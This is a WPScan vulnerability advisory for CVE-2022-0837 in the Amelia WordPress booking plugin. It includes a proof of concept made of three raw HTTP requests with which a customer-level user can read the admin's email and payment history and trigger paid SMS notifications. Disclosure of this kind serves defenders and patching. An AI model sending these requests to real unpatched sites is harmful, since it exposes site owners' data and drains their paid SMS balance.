WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Amelia < 1.0.48 - Customer+ SMS Service Abuse and Sensitive Data Disclosure

Description

The plugin does not have proper authorisation when handling Amelia SMS service, allowing any customer to send paid test SMS notification as well as retrieve sensitive information about the admin, such as the email, account balance and payment history. A malicious actor can abuse this vulnerability to drain out the account balance by keep sending SMS notification.

Proof of Concept

To get the ameliaNonce, view the source code of the Amelia dashboard when logged in as a customer and look for "wpAmeliaNonce"

## Get User Info
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 24

{"action":"getUserInfo"}

Response:
{"message":"Amelia SMS API request successful","data":{"status":"OK","user":{"email":"[email protected]","balance":0}}}

## Get Payment History
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 30

{"action":"getPaymentHistory"}

Response:
{"message":"Amelia SMS API request successful","data":{"status":"OK","payments":[],"countFiltered":0}}

## Send test notification (cost real money)
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 146

{
  "action":"testNotification",
  "data":{
    "type": "appointment",
    "notificationTemplate": 1,
    "recipientPhone":"11111111"
  }
}

Affects Plugins

ameliabooking
Fixed in version 1.0.48

References

CVE
CVE-2022-0837

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Huli from Cymetrics

Submitter

Huli from Cymetrics

Submitter website
https://cymetrics.io
Verified

Yes

WPVDB ID
0882e5c0-f319-4994-9346-aa18438fda6a

Timeline

Publicly Published

2022-03-14 (about 10 months ago)

Added

2022-03-14 (about 10 months ago)

Last Updated

2022-04-17 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin